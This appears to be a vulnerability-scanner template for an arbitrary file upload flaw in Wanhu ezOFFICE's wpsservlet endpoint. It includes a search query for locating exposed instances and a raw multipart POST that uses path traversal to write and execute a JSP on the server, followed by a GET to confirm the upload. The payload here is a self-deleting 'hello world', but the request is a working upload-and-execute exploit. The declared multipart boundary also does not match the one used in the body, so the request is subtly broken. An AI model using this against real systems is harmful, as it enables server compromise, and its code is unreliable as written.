id: wanhu-ezOFFICE-upload-wpsservlet

info:
  name: wanhu-ezOFFICE-upload-wpsservlet
  author: p1z
  severity: critical
  description: |
    万户 ezOFFICE wpsservlet 接口任意文件上传
  reference:
    - https://github.com/ibaiw/2023Hvv/blob/9f530c910492ba03b58befe84c301c865eb9fc81/%E4%B8%87%E6%88%B7%E5%8D%8F%E5%90%8C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md?plain=1#L4
  metadata:
    fofa-query: app="万户网络-ezOFFICE"
    hunter-query: 
    verified: false
  tags: 2023,wanhu,ezOFFICE,upload


requests:
  - raw:
      - |
        POST /defaultroot/wpsservlet?option=saveNewFile&newdocld=1nfo&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1 
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
        Content-Length:266
        Cache-Control:max-age=0
        Content-Type:multipart/form-data;boundary=803e058d60f347f7b3c17fa95228eca6
        Accept-Encoding: gzip,deflate
        Connection:close
        
        --221e166d60f34112b3c17fa95818ecfe
        Content-Disposition:form-data;name="NewFile";filename="1nfo.jsp"
        
        <% out.println("hello world");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
        
        --221e166d60f34112b3c17fa95818ecfe--

      - |
        GET /defaultroot/platform/portal/layout/1nfo.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'hello world'